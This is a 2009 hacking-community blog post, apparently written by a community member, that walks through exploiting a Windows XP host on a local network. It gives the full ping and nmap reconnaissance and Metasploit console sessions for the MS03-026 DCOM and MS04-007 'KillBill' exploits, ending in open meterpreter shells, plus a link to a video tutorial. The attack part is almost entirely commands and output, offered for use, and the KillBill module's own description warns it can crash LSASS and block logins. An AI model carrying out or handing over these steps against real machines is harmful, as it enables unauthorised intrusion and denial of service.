Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Linux / Windows Metasploit POC

18 September 2009
Penulis:   · Kategori Artikel: Cracking

BINUS HACKER Binus Hacker Is Not Criminal Banner



LINUX ENVIRONMENT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
This is an old exploit but still works
i have test it on Local Area Network here
this exploit tested on Windows XP Service Pack 1
[o] DCOM RPC Exploit (ms03_026_dcom)
# Description
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has bee widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)
root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms
root@ubuntu:~# nmap -O -PN 172.16.1.31
Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds
root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 154 aux
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.1.31 yes The target address
RPORT 135 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >
=============================================================================================
=============================================================================================
[o] KILLBILL SMB Exploit (ms04_007_killbill)
# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.
msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PROTO smb yes Which protocol to use: http or smb
RHOST 172.16.1.31 yes The target address
RPORT 445 yes Set the SMB service port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 172.16.1.31 no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP2-SP4 + Windows XP SP0-SP1
msf exploit(ms04_007_killbill) > exploit
[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)
meterpreter > sysinfo
Computer: ******-******
OS : Windows XP (Build 2600, Service Pack 1).
meterpreter >

====================== [EOF] =======================

WINDOWS ENVIRONTMENT

1
2
3
4
5
6
7
8
This is a video tutorial about how to using metasploit GUI on windows.
target still the same as linux version below and using RPC DCOM exploit.
hopefully you like it.. :)
Download the video <a href="http://www.4shared.com/file/115376922/9f3a5229/metasploit_dcom.html">here</a>
Article Tutorial From: Noge / Evilc0de

Tags: , , , ,

BINUS HACKER Binus Hacker Chat and Forum

Komentar

3 Komentar Untuk “Linux / Windows Metasploit POC
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. JoHn pada 20 July 2010 6:18 am

    Metasploit yang baru lebih oke, btw terima kasih buat pencerahannya.

  2. VelmaKelly89 pada 29 July 2010 5:37 pm

    it was very interesting to read http://www.binushacker.net
    I want to quote your post in my blog. It can?
    And you et an account on Twitter?

  3. ingwar_olafson pada 2 August 2010 10:12 am

    I would like to exchange links with your site http://www.binushacker.net
    Is this possible?

Silahkan Berikan Tanggapan Anda...